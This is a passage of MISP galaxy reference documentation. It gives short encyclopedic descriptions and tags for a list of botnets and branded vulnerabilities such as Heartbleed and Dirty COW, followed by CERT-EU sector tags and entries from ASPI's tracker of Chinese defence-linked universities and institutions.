The Nitol botnet is mostly involved in spreading malware and distributed denial-of-service attacks. The Nitol Botnet was first discovered around December 2012, with analysis of the botnet indicating that the botnet is mostly prevalent in China, where an estimated 85% of the infections are detected. In China the botnet was found to be present on systems that came brand-new from the factory, indicating the trojan was installed somewhere during the assembly and manufacturing process. According to Microsoft the systems at risk also contained a counterfeit installation of Microsoft Windows. On 10 September 2012 Microsoft took action against the Nitol Botnet by obtaining a court order and subsequently sinkholing the 3322.org domain. The 3322.org domain is a Dynamic DNS service which was used by the botnet creators as command and control infrastructure for controlling their botnet. Microsoft later settled with 3322.org operator Pen Yong, which allowed the latter to continue operating the domain on the condition that any subdomains linked to malware remain sinkholed.

The tag is: misp-galaxy:botnet="Nitol"

Table 801. Table References

Links

https://en.wikipedia.org/wiki/Nitol_botnet

Nymaim

Nymaim was discovered in 2013. At that time it was only a dropper used to distribute TorrentLocker. In February 2016 it became popular again after incorporating leaked ISFB code, dubbed Goznym. When the dropper obtains the C&C address, it starts the real communication. It downloads two important binaries, among others: the payload, a banker module (responsible for web injects; a passive member of the botnet), and an optional bot module (which tries to open ports on a router and become an active part of the botnet; when it fails to do so, it removes itself from the system).

The tag is: misp-galaxy:botnet="Nymaim"

Table 802. Table References

Links

https://cert.pl/en/posts/2017/01/nymaim-revisited/

PBot

PBot is a P2P botnet derived from the Mirai source code. PBot performs MITB (man-in-the-browser) attacks and injects various scripts into legitimate websites. Its capabilities may go beyond simple injections of ads, depending on the intentions of its distributors.

The tag is: misp-galaxy:botnet="PBot"

PBot is also known as:

  • PythonBot

Table 803. Table References

Links

https://www.malwarebytes.com/blog/news/2018/04/pbot-python-based-adware

https://malpedia.caad.fkie.fraunhofer.de/details/elf.pbot

https://www.bitdefender.com/blog/businessinsights/ddos-attacks-increase-28-as-pbot-authors-use-decades-old-php-code/

Pirrit

Pirrit is a potentially unwanted application (PUA) for Windows and MacOS devices. It displays additional pop-ups and advertisements when the device is used. Pirrit downloads other malicious programs from a server and runs these programs; it can also manipulate system files.

The tag is: misp-galaxy:botnet="Pirrit"

Table 804. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Pitou

Pitou is a trojan for Windows devices. Its functions are to steal passwords and collect various pieces of information about the mobile phone, such as its location and contacts.

The tag is: misp-galaxy:botnet="Pitou"

Table 805. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Prometei

Prometei is a cryptocurrency-mining botnet. Despite their activities being visible in logs, some botnets successfully fly under detection teams' radar, possibly due to their small size or constant development on the adversary’s part. Prometei is just one of these types of networks that focuses on Monero mining.

The tag is: misp-galaxy:botnet="Prometei"

Table 806. Table References

Links

https://blog.talosintelligence.com/prometei-botnet-and-its-quest-for-monero/

PrizeRAT

PrizeRAT is a trojan for Android devices. Its functions include unauthorised user tracking, stealing passwords and the silent installation of additional applications without the user’s permission. As the malware is part of the firmware of the device, it is not generally recognised by anti-virus solutions for Android. The risk affects a limited group of mobile end devices made by Chinese manufacturers for the low-price segment.

The tag is: misp-galaxy:botnet="PrizeRAT"

Table 807. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Pushlran

Pushlran is a potentially unwanted application (PUA) for Android devices. It displays additional pop-ups and advertisements when the device is used. The app collects data from infected systems, intercepts sensitive communication and passes this information to a remote attacker.

The tag is: misp-galaxy:botnet="Pushlran"

Table 808. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Pykspa

Pykspa is a piece of malware that can be used to remotely control infected systems. It also enables attackers to download other malware or extract personal data. There are a number of versions of this malware and it has been developed over a long period of time. Some of the most recent versions of Pykspa are able to deactivate security systems such as anti-virus programs.

The tag is: misp-galaxy:botnet="Pykspa"

Table 809. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Qsnatch

Qsnatch is a trojan for Linux devices that primarily attacks network drives manufactured by QNAP. Its functions include stealing access data and opening backdoors to infected devices. Through this backdoor, the attacker can gain access to the system and perform other actions. The malware is capable of a wide range of attack types, from information theft to downloading other malware.

The tag is: misp-galaxy:botnet="Qsnatch"

Table 810. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Remaiten

Remaiten is malware which infects Linux on embedded systems by brute forcing frequently used default username and password combinations from a list in order to infect a system. Remaiten combines the features of the Tsunami and LizardStresser (aka Torlus) malware families. The command and control for Remaiten is handled by IRC communications. Additionally, the command and control is done by an actual IRC channel rather than only the IRC protocol. This is an improvement over bots such as Tsunami and Torlus, making Remaiten a greater threat than both combined. To avoid detection, Remaiten tries to determine the platform of a device to download the architecture-appropriate component from the command & control server. Once Remaiten infects a device it is able to perform actions such as launching distributed denial of service attacks or downloading more malware onto the device.[5] Remaiten is able to scan for and remove competing bots on a system it has compromised.

The tag is: misp-galaxy:botnet="Remaiten"

Table 811. Table References

Links

https://en.wikipedia.org/wiki/Remaiten

Retadup

Retadup is a worm affecting Windows machines primarily throughout Latin America. Its objective is to achieve persistence on its victims’ computers, to spread itself far and wide and to install additional malware payloads on infected machines. In the vast majority of cases, the installed payload is a piece of malware mining cryptocurrency on the malware authors’ behalf. The French law enforcement agency, the National Gendarmerie, in 2019 announced the successful takedown of the RETADUP botnet, one of the largest and most widespread, and how it remotely disinfected more than 850,000 computers worldwide with the help of researchers.

The tag is: misp-galaxy:botnet="Retadup"

Table 812. Table References

Links

https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/

https://thehackernews.com/2019/08/retadup-botnet-malware.html

RootSTV

RootSTV is a trojan and downloader for Android devices, mainly SmartTVs. RootSTV downloads additional malicious programs from a server and executes them without the user’s consent.

The tag is: misp-galaxy:botnet="RootSTV"

Table 813. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze_node.html

Rovnix

Rovnix is a data-stealing trojan that spreads by email and infects Windows PCs. Initial versions of the malware featured the extraction of data from compromised machines using unencrypted comms but more recently this has evolved to feature encryption during broadcast. The malware spread via e-mails infected with the Andromeda downloader. The infected attachment gets executed by an unwary user and this in turn downloads and runs Rovnix. The whole attack is designed to steal financial information, mainly credit card numbers. A new cluster of infections by the Rovnix Trojan has infected more than 130,000 Windows computers in the UK alone.

The tag is: misp-galaxy:botnet="Rovnix"

Table 814. Table References

Links

https://www.theregister.com/2014/11/06/rovnix_trojan_outbreak/

Slenfbot

Slenfbot was first discovered in 2007 and, since then, numerous variants have followed; each with slightly different characteristics and new additions to the worm’s payload, such as the ability to provide the attacker with unauthorized access to the compromised host. Slenfbot primarily spreads by luring users to follow links to websites, which contain a malicious payload. Slenfbot propagates via instant messaging applications, removable drives and/or the local network via network shares. The code for Slenfbot appears to be closely managed, which may provide attribution to a single group and/or indicate that a large portion of the code is shared amongst multiple groups. The inclusion of other malware families and variants as well as its own continuous evolution, makes Slenfbot a highly effective downloader with a propensity to cause even more damage to compromised systems.

The tag is: misp-galaxy:botnet="Slenfbot"

Table 815. Table References

Links

https://en.wikipedia.org/wiki/Slenfbot

Stacheldraht

Stacheldraht is malware which performs a distributed denial-of-service (DDoS) attack. Stacheldraht uses a number of different denial-of-service (DoS) attack methods, including Ping flood, UDP flood, TCP SYN flood, and Smurf attack. Further, it can detect and automatically enable source address forgery. Adding encryption, it combines features of Trinoo and of Tribe Flood Network. The software runs on both Linux and Solaris.

The tag is: misp-galaxy:botnet="Stacheldraht"

Table 816. Table References

Links

https://en.wikipedia.org/wiki/Stacheldraht

Suppobox

Suppobox is a trojan that intercepts any network traffic connected with a monetary transaction when users buy or sell products online. The malware focuses on auction websites.

The tag is: misp-galaxy:botnet="Suppobox"

Suppobox is also known as:

  • Bayrob

  • Nivdort

Table 817. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Triada

Triada is a trojan for Android devices. Triada’s primary function is to record text messages. For example, it intercepts in-app purchases via text message and redirects payments made. Triada downloads other malware from a server and runs these programs.

The tag is: misp-galaxy:botnet="Triada"

Triada is also known as:

  • APK. Triada

Table 818. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Trinoo

Trinoo is a set of computer programs to conduct a DDoS attack. It is believed that trinoo networks have been set up on thousands of systems on the Internet that have been compromised by remote buffer overrun exploits.

The tag is: misp-galaxy:botnet="Trinoo"

Trinoo is also known as:

  • trin00

Table 819. Table References

Links

https://en.wikipedia.org/wiki/Trinoo

Zemra

Zemra is a DDoS Bot which was first discovered in underground forums in May 2012. Zemra is capable of HTTP and SYN flooding and also has a simple Command & Control panel that is protected with 256-bit DES encryption for communicating with its command and control (C&C) server. Zemra also sends information such as computer name, language settings, and Windows version. It will send this data to a remote location on a specific date and time. It also opens a backdoor on TCP port 7710 to receive commands from a remote command-and-control server, and it is able to monitor devices, collect system information, execute files, and even update or uninstall itself if necessary.

The tag is: misp-galaxy:botnet="Zemra"

Table 820. Table References

Links

https://en.wikipedia.org/wiki/Zemra

Ztorg

Ztorg is a trojan for Android devices. Its functions include unauthorised user tracking, stealing passwords, the silent installation of additional applications without the user’s permission, and the collection of data on the mobile phone, such as its location and contacts. Ztorg is a piece of malware that opens a backdoor to an infected device. Through this backdoor, the attacker can gain access to the system and perform other actions. The malware is capable of a wide range of attack types, from information theft to downloading other malware.

The tag is: misp-galaxy:botnet="Ztorg"

Table 821. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze_node.html

Branded Vulnerability

List of known vulnerabilities and attacks with a branding.

Branded Vulnerability is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Unknown

Meltdown

Meltdown exploits the out-of-order execution feature of modern processors, allowing user-level programs to access kernel memory using processor caches as covert side channels. This is specific to the way out-of-order execution is implemented in the processors. This vulnerability has been assigned CVE-2017-5754.

The tag is: misp-galaxy:branded-vulnerability="Meltdown"

Spectre

Spectre exploits the speculative execution feature that is present in almost all processors in existence today. Two variants of Spectre are known and seem to depend on what is used to influence erroneous speculative execution. The first variant triggers speculative execution by performing a bounds check bypass and has been assigned CVE-2017-5753. The second variant uses branch target injection for the same effect and has been assigned CVE-2017-5715.

The tag is: misp-galaxy:branded-vulnerability="Spectre"

Heartbleed

Heartbleed is a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed may be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It results from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension, thus the bug’s name derives from heartbeat. The vulnerability is classified as a buffer over-read,[5] a situation where more data can be read than should be allowed.

The tag is: misp-galaxy:branded-vulnerability="Heartbleed"

Shellshock

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

The tag is: misp-galaxy:branded-vulnerability="Shellshock"

Ghost

The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue. During a code audit Qualys researchers discovered a buffer overflow in the __nss_hostname_digits_dots() function of glibc. This bug can be triggered both locally and remotely via all the gethostbyname*() functions. Applications have access to the DNS resolver primarily through the gethostbyname*() set of functions. These functions convert a hostname into an IP address.

The tag is: misp-galaxy:branded-vulnerability="Ghost"

Stagefright

Stagefright is the name given to a group of software bugs that affect versions 2.2 ("Froyo") and newer of the Android operating system. The name is taken from the affected library, which among other things, is used to unpack MMS messages. Exploitation of the bug allows an attacker to perform arbitrary operations on the victim’s device through remote code execution and privilege escalation. Security researchers demonstrate the bugs with a proof of concept that sends specially crafted MMS messages to the victim device and in most cases requires no end-user actions upon message reception to succeed—the user doesn’t have to do anything to ‘accept’ the bug, it happens in the background. The phone number is the only target information.

The tag is: misp-galaxy:branded-vulnerability="Stagefright"

Badlock

Badlock is a security bug disclosed on April 12, 2016 affecting the Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) remote protocols[1] supported by Windows and Samba servers.

The tag is: misp-galaxy:branded-vulnerability="Badlock"

Dirty COW

Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affects all Linux-based operating systems including Android. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel’s memory-management subsystem. The vulnerability was discovered by Phil Oester. Because of the race condition, with the right timing, a local attacker can exploit the copy-on-write mechanism to turn a read-only mapping of a file into a writable mapping. Although it is a local privilege escalation, remote attackers can use it in conjunction with other exploits that allow remote execution of non-privileged code to achieve remote root access on a computer. The attack itself does not leave traces in the system log.

The tag is: misp-galaxy:branded-vulnerability="Dirty COW"

POODLE

The POODLE attack (which stands for "Padding Oracle On Downgraded Legacy Encryption") is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0. If attackers successfully exploit this vulnerability, on average, they only need to make 256 SSL 3.0 requests to reveal one byte of encrypted messages. Bodo Möller, Thai Duong and Krzysztof Kotowicz from the Google Security Team discovered this vulnerability; they disclosed the vulnerability publicly on October 14, 2014 (despite the paper being dated "September 2014"). Ivan Ristic does not consider the POODLE attack as serious as the Heartbleed and Shellshock attacks. On December 8, 2014 a variation of the POODLE vulnerability that affected TLS was announced.

The tag is: misp-galaxy:branded-vulnerability="POODLE"

BadUSB

The ‘BadUSB’ vulnerability exploits unprotected firmware in order to deliver malicious code to computers and networks. This is achieved by reverse-engineering the device and reprogramming it. As the reprogrammed firmware is not monitored or assessed by modern security software, this attack method is extremely difficult for antivirus/security software to detect and prevent.

The tag is: misp-galaxy:branded-vulnerability="BadUSB"

ImageTragick

The tag is: misp-galaxy:branded-vulnerability="ImageTragick"

Blacknurse

Blacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.

The tag is: misp-galaxy:branded-vulnerability="Blacknurse"

SPOILER

SPOILER is a security vulnerability on modern computer central processing units that uses speculative execution to improve the efficiency of Rowhammer and other related memory and cache attacks. According to reports, all modern Intel CPUs are vulnerable to the attack. AMD has stated that its processors are not vulnerable.

The tag is: misp-galaxy:branded-vulnerability="SPOILER"

Table 822. Table References

Links

https://arxiv.org/pdf/1903.00446v1.pdf

https://appleinsider.com/articles/19/03/05/new-spoiler-vulnerability-in-all-intel-core-processors-exposed-by-researchers

https://www.overclock3d.net/news/cpu_mainboard/spoiler_alert-_intel_cpus_impacted_by_new_vulnerability/1

https://www.1e.com/news-insights/blogs/the-spoiler-vulnerability/

https://www.bleepingcomputer.com/news/security/amd-believes-spoiler-vulnerability-does-not-impact-its-processors/

BlueKeep

A ‘wormable’ critical Remote Code Execution (RCE) vulnerability in Remote Desktop Services that could soon become the new go-to vector for spreading malware.

The tag is: misp-galaxy:branded-vulnerability="BlueKeep"

Table 823. Table References

Links

https://www.welivesecurity.com/2019/05/22/patch-now-bluekeep-vulnerability/

Cert EU GovSector

Cert EU GovSector.

Cert EU GovSector is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

Constituency

The tag is: misp-galaxy:cert-eu-govsector="Constituency"

EU-Centric

The tag is: misp-galaxy:cert-eu-govsector="EU-Centric"

EU-nearby

The tag is: misp-galaxy:cert-eu-govsector="EU-nearby"

World-class

The tag is: misp-galaxy:cert-eu-govsector="World-class"

Unknown

The tag is: misp-galaxy:cert-eu-govsector="Unknown"

Outside World

The tag is: misp-galaxy:cert-eu-govsector="Outside World"

China Defence Universities Tracker

The China Defence Universities Tracker is a database of Chinese institutions engaged in military or security-related science and technology research. It was created by ASPI’s International Cyber Policy Centre.

China Defence Universities Tracker is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Australian Strategic Policy Institute

Academy of Military Science (中国人民解放军军事科学院)

AMS is responsible for leading and coordinating military science for the whole military. AMS is involved in not only the development of theory, strategy, and doctrine but also advancing national defense innovation. Pursuant to the PLA reforms, AMS has undergone dramatic changes starting in June 2017. At a July 2017 ceremony marking the AMS’s reorganisation, Xi urged the AMS to construct a ‘world-class military scientific research institution.’ Through the National Defence Science and Technology Innovation Institute, the AMS is pursuing research in cutting-edge technologies including unmanned systems, artificial intelligence, biotechnology and quantum technology.

The tag is: misp-galaxy:china-defence-universities="Academy of Military Science (中国人民解放军军事科学院)"

Table 824. Table References

Links

https://unitracker.aspi.org.au/universities/academy-of-military-science

Aero Engine Corporation of China (中国航空发动机集团有限公司)

AECC is a leading producer of aircraft parts for the People’s Liberation Army (PLA), having separated from its parent company the Aviation Industry Corporation of China (AVIC) in 2016. The company reports having 27 affiliated or subordinate companies, three major listed companies, and 84,000 staff. AVIC and the Commercial Aircraft Corporation of China (also known as COMAC) are major shareholders in AECC. AECC’s main products include aircraft engines, combustion gas turbines, and transmission systems. AECC also develops aircraft power units, helicopter drive systems, monocrystalline blades, turbine disks, and graphene. AECC was established in order to improve China’s capability in developing domestically built aircraft engines as part of the ‘Made in China 2025’ program. A priority is strengthening its supply chains within China. Though indigenously developed engines have proven challenging for AECC, the company had purported success in providing thrust vector control technology for the J-10B fighter jet.

The tag is: misp-galaxy:china-defence-universities="Aero Engine Corporation of China (中国航空发动机集团有限公司)"

Table 825. Table References

Links

https://unitracker.aspi.org.au/universities/aero-engine-corporation-of-china

Air Force Command College (中国人民解放军空军指挥学院)

The PLA Air Force Command College in Beijing is considered the PLA Air Force’s ‘peak institution for educating mid-rank and senior officers’ for command posts across the service. The college has a long history and was initially established in Nanjing during the early years of the People’s Republic in 1958. The Air Force Command College offers a range of degree programmes, mainly at the postgraduate level, including training in military disciplines such as military history, strategy, and tactics. It has published research on control science and radar. The college’s other specialties include battlefield command, military operations as well as political–ideological education.

The tag is: misp-galaxy:china-defence-universities="Air Force Command College (中国人民解放军空军指挥学院)"

Table 826. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-command-college

Air Force Communication NCO Academy (中国人民解放军空军通信士官学校)

The Air Force Communications Officers Academy is the PLA’s premier institution for the training of non-commissioned officers in communications systems and security. Established in 1986 as the Dalian Communications NCO College, the institution was renamed after Xi Jinping’s military reforms in 2017. The academy’s areas of research include command automation and satellite communications, along with wired and wireless communications.

The tag is: misp-galaxy:china-defence-universities="Air Force Communication NCO Academy (中国人民解放军空军通信士官学校)"

Table 827. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-communications-officers-college

Air Force Early Warning Academy (中国人民解放军空军预警学院)

The Air Force Early Warning Academy is ‘an institution that trains military personnel from the PLA Air Force and Navy’s radar and electronic warfare units in command, engineering and technology’ that was established after the amalgamation of the Air Defence Academy and Radar College in 1958. As such, the Air Force Early Warning Academy focuses its research on radar engineering, information command systems engineering, networked command engineering, and early warning detection systems.

The tag is: misp-galaxy:china-defence-universities="Air Force Early Warning Academy (中国人民解放军空军预警学院)"

Table 828. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-early-warning-academy

Air Force Engineering University (中国人民解放军空军工程大学)

The Air Force Engineering University (AFEU) is one of the PLA’s five comprehensive universities alongside NUDT, Naval Engineering University, PLA Information Engineering University and Army Engineering University. It trains students in a variety of engineering and military disciplines related to air combat. AFEU currently has around 8,000 students, including 1,600 postgraduate students. Its priority areas include technical studies in information and communication systems engineering as well as in social sciences such as in professional military training. Research into unmanned aerial vehicle technology is another important area of research at the university. In 2017, China’s Ministry of Education ranked AFEU equal fourth for armament science out of nine universities, only awarding it a B- grade for the discipline. Colleges under AFEU include:

The tag is: misp-galaxy:china-defence-universities="Air Force Engineering University (中国人民解放军空军工程大学)"

Table 829. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-engineering-university

Air Force Flight Academy Shijiazhuang (空军石家庄飞行学院)

The tag is: misp-galaxy:china-defence-universities="Air Force Flight Academy Shijiazhuang (空军石家庄飞行学院)"

Table 830. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-flight-academy-shijiazhuang

Air Force Harbin Flight Academy (空军哈尔滨飞行学院)

The Academy is home to the Air Force Harbin Flight Academy Simulation Training Center, a 2,500 m² large-scale aircraft simulator where students can train in simulated transport and bomber aircraft. The Academy hopes to continue developing the Simulation Training Center into a ‘laboratory for air operations,’ including advanced training such as simulated tactical confrontations.

The tag is: misp-galaxy:china-defence-universities="Air Force Harbin Flight Academy (空军哈尔滨飞行学院)"

Table 831. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-harbin-flight-academy

Air Force Logistics University (中国人民解放军空军后勤学院)

The Air Force Logistics University is an institution devoted to the study of command, management and technology for the PLA, established in Shanxi by the Central Military Commission in 1954. The university focusses its research on ‘management engineering’ for military equipment such as weaponry and aircraft fuel and also maintains research programmes on air battle command and personnel management.

The tag is: misp-galaxy:china-defence-universities="Air Force Logistics University (中国人民解放军空军后勤学院)"

Table 832. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-logistics-university

Air Force Medical University (中国人民解放军空军军医大学)

The Air Force Medical University, also known as the Fourth Military Medical University, is the PLA’s premier institution for research into medical and psychological sciences, having been placed under command of the Air Force after Xi Jinping’s military reforms in 2017. Its major areas of study are medical and psychological sciences tailored for personnel engaging in air and space operations, military preventative medicine and various other forms of clinical research. The Air Force Medical University conducts significant amounts of psychological research. Scientists from the Air Force Medical University have written studies on suicide, mental health across China, and mental health in military universities. The university’s scientists have also looked at the extent to which mindfulness training can reduce anxiety for undergraduates at military universities, and at how fear induced by virtual combat scenarios impacts decision-making. This indicates that the university is interested in issues of troop morale and decision-making in high-stress situations.

The tag is: misp-galaxy:china-defence-universities="Air Force Medical University (中国人民解放军空军军医大学)"

Table 833. Table References

Links

https://unitracker.aspi.org.au/universities/fourth-military-medical-university

Air Force Research Institute (中国人民解放军空军研究院)

The Air Force Research Institute is an air force scientific research institute, the successor to the Air Force Equipment Academy (空军装备研究院), that was established in 2017. The institute runs the Key Laboratory of Complex Aviation System Simulation (复杂航空系统仿真国防重点实验室) and carries out research on areas such as aircraft design, flight control, guidance and navigation, and electronic countermeasures.

The tag is: misp-galaxy:china-defence-universities="Air Force Research Institute (中国人民解放军空军研究院)"

Table 834. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-research-institute

Air Force Xi’an Flight Academy (中国人民解放军空军西安飞行学院)

Created upon the merger of the PLA Air Force’s Second and Fifth Flight Academies in 2011, the Air Force Xi’an Flight Academy specialises in training airmen in aviation while passing on the PLA’s ‘revolutionary traditions’. It remains ‘one of the Air Force’s three advanced institutions in air combat’, and is known to train the PLA Air Force’s JJ-7 fighter pilots. Given this focus on training, the institution engages in little scientific research.

The tag is: misp-galaxy:china-defence-universities="Air Force Xi’an Flight Academy (中国人民解放军空军西安飞行学院)"

Table 835. Table References

Links

https://unitracker.aspi.org.au/universities/air-force-xian-flight-academy

Anhui University (安徽大学)

Anhui University is overseen by the Anhui Provincial Government. In January 2019, defence industry agency SASTIND and the Anhui Provincial Government signed an agreement to jointly develop Anhui University. This agreement with SASTIND suggests that the university will increase its role in defense research in the future.

The tag is: misp-galaxy:china-defence-universities="Anhui University (安徽大学)"

Table 836. Table References

Links

https://unitracker.aspi.org.au/universities/anhui-university

Army Academy of Armored Forces (中国人民解放军陆军装甲兵学院)

The Army Academy of the Armored Forces is China’s lead institute responsible for training and research for armoured combat. This includes a focus on tank warfare, mechanised artillery and infantry operations. The academy offers training in ‘armored combat command, surveillance and intelligence, operational tactics’ as well as in engineering disciplines relevant to operations involving the PLA Ground Force’s armoured corps, such as materials science, mechanical engineering, electrical engineering and automation, communications engineering, weapons systems engineering and photoelectric information science.

The tag is: misp-galaxy:china-defence-universities="Army Academy of Armored Forces (中国人民解放军陆军装甲兵学院)"

Table 837. Table References

Links

https://unitracker.aspi.org.au/universities/army-academy-of-armored-forces

Army Academy of Artillery and Air Defense (中国人民解放军陆军炮兵防空兵学院)

The Army Academy of Artillery and Air Defense is an institution devoted to training artillery and air defence officers in the PLA Ground Force. Its areas of focus include electrical engineering and automation, munitions engineering and explosives technology, radar engineering, and missile engineering.

The tag is: misp-galaxy:china-defence-universities="Army Academy of Artillery and Air Defense (中国人民解放军陆军炮兵防空兵学院)"

Table 838. Table References

Links

https://unitracker.aspi.org.au/universities/army-academy-of-artillery-and-air-defense

Army Academy of Border and Coastal Defense (中国人民解放军陆军边海学院)

With a history dating back to 1941, the Army Academy of Border and Coastal Defense is the only institution of higher education devoted to training PLA Ground Force personnel in border and coastal defence operations. Its subjects of focus include firepower command and control engineering, and command information systems engineering.

The tag is: misp-galaxy:china-defence-universities="Army Academy of Border and Coastal Defense (中国人民解放军陆军边海学院)"

Table 839. Table References

Links

https://unitracker.aspi.org.au/universities/army-academy-of-border-and-coastal-defense

Army Aviation College (中国人民解放军陆军航空兵学院)

The Army Aviation College is the PLA’s institution responsible for training mid-career helicopter pilots from the PLA Air Force and aviation officers from the PLA Ground Force. The college’s subject areas include aircraft and engine design, aviation communications and air defence systems, flight radar maintenance engineering, and combat aircraft maintenance engineering.

The tag is: misp-galaxy:china-defence-universities="Army Aviation College (中国人民解放军陆军航空兵学院)"

Table 840. Table References

Links

https://unitracker.aspi.org.au/universities/army-aviation-college

Army Engineering University (中国人民解放军陆军工程大学)

The Army Engineering University was established in 2017 following the abolition of the PLA University of Science and Technology. The university is devoted to research on ‘engineering, technology and combat command systems’ for the PLA Land Force. The university’s areas of research include:

The tag is: misp-galaxy:china-defence-universities="Army Engineering University (中国人民解放军陆军工程大学)"

Table 841. Table References

Links

https://unitracker.aspi.org.au/universities/army-engineering-university

Army Infantry Academy (中国人民解放军陆军步兵学院)

The Army Infantry Academy is a higher education institution in China devoted to providing elementary training in command for infantry soldiers in the PLA Ground Force. The academy teaches courses in operational disciplines such as command information systems engineering, armored vehicles engineering and weapons systems engineering. As well as providing formal teaching, the Army Infantry Academy also provides oversight for training exercises and electronic warfare simulations.

The tag is: misp-galaxy:china-defence-universities="Army Infantry Academy (中国人民解放军陆军步兵学院)"

Table 842. Table References

Links

https://unitracker.aspi.org.au/universities/army-infantry-academy

Army Medical University (中国人民解放军陆军军医大学)

The PLA Army Medical University, formerly known as the Third Military Medical University, is a medical education university affiliated with the PLA Ground Force. It was formed in 2017 through a merger with the PLA Western Theater Command Urumqi Comprehensive Training Base’s Military Medical Training Brigade and the Tibet Military Region’s Eighth Hospital. The Army Medical University includes six national key laboratories and 32 Ministry of Education or military key laboratories. It has won military awards for science and technology progress and seven national science and technology prizes.

The tag is: misp-galaxy:china-defence-universities="Army Medical University (中国人民解放军陆军军医大学)"

Table 843. Table References

Links

https://unitracker.aspi.org.au/universities/army-medical-university

Army Military Transportation Academy (中国人民解放军陆军军事交通学院)

The Army Military Transport Academy is a higher education institution devoted to training PLA Ground Force personnel in military transport and logistics. The academy focusses on military transport command engineering, command and automation engineering, ordnance engineering, and armament sustainment command.

The tag is: misp-galaxy:china-defence-universities="Army Military Transportation Academy (中国人民解放军陆军军事交通学院)"

Table 844. Table References

Links

https://unitracker.aspi.org.au/universities/army-military-transportation-academy-2

Army Research Institute (中国人民解放军陆军研究院)

The Army Research Institute is an institution devoted to advanced defence research with applications to land warfare. The institute engages in a variety of defence research including radar technology, lasers, and hybrid electric vehicles. Researchers from the institute are known to have collaborated with partners from China’s civilian universities in areas such as advanced manufacturing and automatic control, and laser technology. The Army Research Institute collaborates with civilian companies as part of China’s military-civil fusion program. For example, General Guo Guangsheng from the Army Research Institute made a visit to Hong Run Precision Instruments Co. Ltd. (虹润精密仪器有限公司) on 24 August 2019 to assess how the company was performing in its military-civil fusion activities. Researchers from the Army Research Institute have also been involved in the product design and development of dual-use automobiles as part of a military-civil fusion project called ‘Research, Development and Commercialisation of Advanced Off-road Passenger Vehicles’ (新一代军民通用高端越野乘用汽车研发及产业化). The project included research into vehicles such as the BJ80 military and civilian off-road passenger vehicles as well as the BJ40L off-road vehicle.

The tag is: misp-galaxy:china-defence-universities="Army Research Institute (中国人民解放军陆军研究院)"

